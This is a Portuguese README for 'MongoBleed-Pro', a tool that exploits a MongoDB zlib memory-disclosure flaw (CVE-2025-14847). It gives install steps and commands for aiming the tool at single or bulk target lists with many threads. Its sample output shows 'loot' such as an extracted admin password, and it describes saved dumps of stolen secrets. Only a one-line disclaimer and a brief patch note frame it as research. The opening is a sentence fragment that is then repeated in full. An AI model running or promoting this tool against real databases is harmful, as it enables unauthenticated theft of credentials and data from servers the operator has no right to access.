
uma vulnerabilidade crítica de divulgação de memória no tratamento de compressão zlib do MongoDB. Esta ferramenta permite que pesquisadores de segurança extraiam dados sensíveis de instâncias MongoDB vulneráveis.
Ferramenta Avançada de Exploração de Vazamento de Memória MongoDB
Continue Aprendendo | Continue Hackeando com CyberTechAjju
MongoBleed-Pro é uma ferramenta avançada de exploração para CVE-2025-14847, uma vulnerabilidade crítica de divulgação de memória no tratamento de compressão zlib do MongoDB. Esta ferramenta permite que pesquisadores de segurança extraiam dados confidenciais de instâncias MongoDB vulneráveis.
Esta ferramenta destina-se apenas a testes de segurança autorizados e fins educacionais. O acesso não autorizado a sistemas de computador é ilegal. Sempre obtenha autorização adequada antes de testar.
# Clone o repositório
git clone https://github.com/cybertechajju/CVE-2025-14847_Expolit.git
cd CVE-2025-14847_Expolit
# Instale as dependências
pip install -r requirements.txt
python3 mongobleed_pro.py
python3 mongobleed_pro.py --target 192.168.1.100
python3 mongobleed_pro.py --target 192.168.1.100:27018
python3 mongobleed_pro.py --file targets.txt
python3 mongobleed_pro.py --target 192.168.1.100 --threads 100 --min-offset 100 --max-offset 20000
╔══════════════════════════════════════════════════════════════╗
║ 💀 INITIATING MEMORY EXTRACTION SEQUENCE 💀 ║
╚══════════════════════════════════════════════════════════════╝
⚡ Target Acquired: 192.168.1.100:27017
✓ Port OPEN
☠️ VULNERABLE! Initiating attack...
◉ 0x0E31 │ nr_inactive_anon 134420\nnr_active_anon 110832...
☠️ LOOT ACQUIRED: 🔐 Password
→ admin_pass=SuperSecret123
╔══════════════════ EXTRACTION COMPLETE ══════════════════╗
║ 💾 Bytes Extracted: 125,847
║ 📦 Unique Fragments: 342
║ 🔑 Secrets Found: 5
╚══════════════════════════════════════════════════════════╝
| Arquivo | Descrição |
|---|---|
loot_<host>.txt | Segredos extraídos em formato legível |
dump_<host>.bin | Despejo de memória bruto para análise manual |
Se você é administrador do MongoDB, atualize para as versões corrigidas:
CyberTechAjju
Este projeto é licenciado sob a Licença MIT - consulte o arquivo LICENSE para obter detalhes.
Se você achou esta ferramenta útil, por favor, dê uma ⭐ no GitHub!
「 Continue Aprendendo | Continue Hackeando 」
Feito com ❤️ por CyberTechAjju
| Propriedade | Detalhes |
|---|
| ID do CVE | CVE-2025-14847 |
| Tipo de Vulnerabilidade | Divulgação de Memória |
| Versões Afetadas | MongoDB < 8.0.10, < 7.3.6, < 7.0.19, < 6.0.23 |
| Causa Raiz | Leitura excessiva de buffer na descompressão zlib |
| Impacto | Vazamento remoto de memória sem autenticação |
| Argumento | Descrição | Padrão |
|---|
--target | IP/URL do alvo | Prompt interativo |
--file | Arquivo com lista de alvos | Nenhum |
--threads | Número de threads | 50 |
--min-offset | Deslocamento mínimo de memória | 20 |
--max-offset | Deslocamento máximo de memória | 8192 |